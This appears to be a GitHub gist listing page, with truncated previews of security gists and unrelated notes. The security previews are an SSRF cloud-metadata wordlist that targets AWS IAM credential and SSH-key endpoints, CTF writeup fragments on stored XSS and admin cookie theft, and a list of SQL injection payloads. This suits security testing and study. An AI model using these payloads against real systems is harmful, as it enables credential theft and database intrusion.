Syue Siang Su qazbnm456

<Query Kind="Program">
<Namespace>Microsoft.AspNetCore.WebUtilities</Namespace>
<Namespace>System.IO.Compression</Namespace>
<Namespace>System.Security.Cryptography</Namespace>
<AppConfig>
<Content>
<configuration>
<runtime>
<loadFromRemoteSources enabled="true" />
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
@qazbnm456
qazbnm456 / cloud_metadata.txt
Created April 25, 2018 08:07 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

h4x0rs.club 2

The application was built from 2 parts: a frontend page (https://h4x0rs.club/game/) and a backend page (https://backend.h4x0rs.club/backend_www/), communicating via postMessage. There were several issues:

  1. Stored XSS on the user profile page.

It's also possible to make the victim's browser trigger a click on an injected element

if(location.hash.slice(1) == 'report'){
    document.getElementById('report-btn').click();
}
@qazbnm456
qazbnm456 / 0ctf_h4x0rs.space.md
Created April 3, 2018 16:41 — forked from masatokinugawa/0ctf_h4x0rs.space.md
0CTF/TCTF 2018 Quals h4x0rs.space Writeup (Web 1000)


Problem

I've made a blog platform let you write your secret. 
Nobody can know it since I enabled all of modern web security mechanism, is it cool, huh?

Get `document.cookie` of the admin.

h4x0rs.space
&()o1: select * from users where id=1 or (\)=1 union select 1,@@VERSION -- 1
&(.)o: select * from users where id=1 or (\.)=1 union select 1,@@VERSION -- 1
&(1&1: select * from users where id=1 or (\+)=1 or 1=1 -- 1
&(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1
&(1UE: select * from users where id=1 or (\+)=1 union select 1,@@VERSION -- 1
&(n&1: select * from users where id=1 or ($+)=1 or 1=1 -- 1
&(nUE: select * from users where id=1 or ($+)=1 union select 1,@@VERSION -- 1
&.o&1: select * from users where id=1 or \.<\ or 1=1 -- 1
&.o1&: select * from users where id=1 or \.<1 or 1=1 -- 1
&.o1U: select * from users where id=1 or \.<1 union select 1,@@VERSION -- 1
@qazbnm456
qazbnm456 / all.txt
Created March 16, 2018 16:59 — forked from jhaddix/all.txt
dnsall
@qazbnm456
qazbnm456 / Electron 入門.md
Created September 15, 2017 08:44 — forked from umamichi/Electron 入門.md
Introduction to Electron
@qazbnm456
qazbnm456 / gist:bbccbcd7ad4b5e33dac14223d468e89c
Created May 28, 2016 03:45 — forked from timdream/gist:5968469
GitHub Pull Request & Contribution Workflow Quick Reference

Preface

Readers of this article are expected to already know how to:

  • Create a GitHub account
  • Fork a code repository
  • Use command-line git on their own computer
  • Clone their own repository